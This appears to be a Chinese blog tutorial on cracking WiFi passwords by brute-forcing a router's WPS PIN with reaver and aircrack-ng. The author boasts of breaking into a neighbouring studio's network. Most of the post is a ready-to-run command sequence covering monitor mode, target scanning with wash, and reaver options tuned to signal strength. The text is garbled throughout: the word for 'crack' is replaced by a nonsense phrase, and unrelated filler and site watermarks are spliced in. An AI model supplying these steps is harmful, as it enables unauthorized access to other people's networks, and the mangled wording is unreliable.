使用reaver傻瓜式激活成功教程wifi之利用路由器WPS漏洞

使用reaver傻瓜式激活成功教程wifi之利用路由器WPS漏洞跟这篇激活成功教程教程一样,网上激活成功教程教程多是基于路由器的WPS漏洞激活成功教程,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要激活成功教程一般的wifi,还得激活成功教程这个协议,虽然近期这个协议也被激活成功教程了,不过也是很不容易的。刚入门激活成功教程,不是很熟悉,在网上找各种激活成功教程资料,终于激活成功教程成功了临近工作室的wifi,沾沾自喜~本文激活成功教程wifi针对一些路由器的WPS(Wi-fipro...

跟这篇激活成功教程教程一样,网上激活成功教程教程多是基于路由器的WPS漏洞激活成功教程,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要激活成功教程一般的wifi,还得激活成功教程这个协议,虽然近期这个协议也被激活成功教程了,不过也是很不容易的。
刚入门激活成功教程,不是很熟悉,在网上找各种激活成功教程资料,终于激活成功教程成功了临近工作室的wifi,沾沾自喜~
本文激活成功教程wifi针对一些路由器的WPS(Wi-fi protected setup)漏洞,尝试很多次抓包PIN码,激活成功教程2-3天,正常来说是一定能抓到正确的PIN码的。
一个路由器对应唯一的MAC和PIN,而一旦得到MAC和PIN,通过reaver工具,路由密码等信息就可以很快得出来。
1.安装依赖包:
sudo apt-get install -y libpcap-dev
libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2.安装aircrack-ng:
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make (aircrack-ng源码安装参考http://www.tuicool.com/articles/MfUjii)
sudo make install
3.安装reaver:
https://pan.baidu.com/s/1kUdvM1D下载reaver
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
4.如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用(如果没有ethtool,要安装:apt-get install ethtool)
5.开始激活成功教程:(参考http://www.she.vc/article/18-108334-0.html http://www.kali.org.cn/thread-20995-1-1.html)
(1)sudo airmon-ng check kill (关闭进程,部分进程可能影响到后续的操作)

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 avahi-daemon
  446 dhcpcd
  470 avahi-daemon
  512 wpa_supplicant
只听到从架构师办公室传来架构君的声音:
光夜烛,德信著,灵浸鸿,长生豫。有谁来对上联或下联?

(2)sudo airmon-ng
(3)sudo airmon-ng start wlan1
(4)sudo airmon-ng start wlan1mon (开启网卡,将网卡转换成混杂模式)

此代码由Java架构师必看网-架构君整理
PHY Interface Driver Chipset phy0 wlan0 brcmfmac_sdio Broadcom 43430 Missing nexutil, cannot switch to monitor mode. phy1 wlan1mon mt7601u Ralink Technology, Corp. (mac80211 monitor mode already enabled for [phy1]wlan1mon on [phy1]10)

(5)sudo airodump-ng wlan1mon (查看ap信号强度,激活成功教程的wifi信号越强越好)
(6)wash -i wlan1mon -C (查看支持wps的ap)(一种说法是:MB是54e.的可激活成功教程,54e不可激活成功教程)
6.(正式激活成功教程,在root下)使用reaver:
因状况调整参数:MAC即BSSID的值,-c后面的数字是CH的值。
目标信号非常好:
reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1
目标信号普通:
reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般:
reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1
7.每60s重新激活成功教程一次,等待三天,密码将会出来
8.最终得到PIN码(WPS PIN)和密码(WPA PSK),如果密码 被改,只要reaver加上-p命令
(reaver -i wlan1mon -b MAC -p PIN码 -vv),密码又能秒出; 但如果PIN码被改,就要重新激活成功教程了。
9.激活成功教程完成后,将网卡转回正常状态(airmon-ng stop wlan1mon)
激活成功教程过程

激活成功教程完成
备注:reaver时可以随时停止,它自己会保存进度
升级激活成功教程固件http://netsecurity.51cto.com/art/201105/264844_all.htm

架构君码字不易,如需转载,请注明出处:https://javajgs.com/archives/210391
0
   

发表评论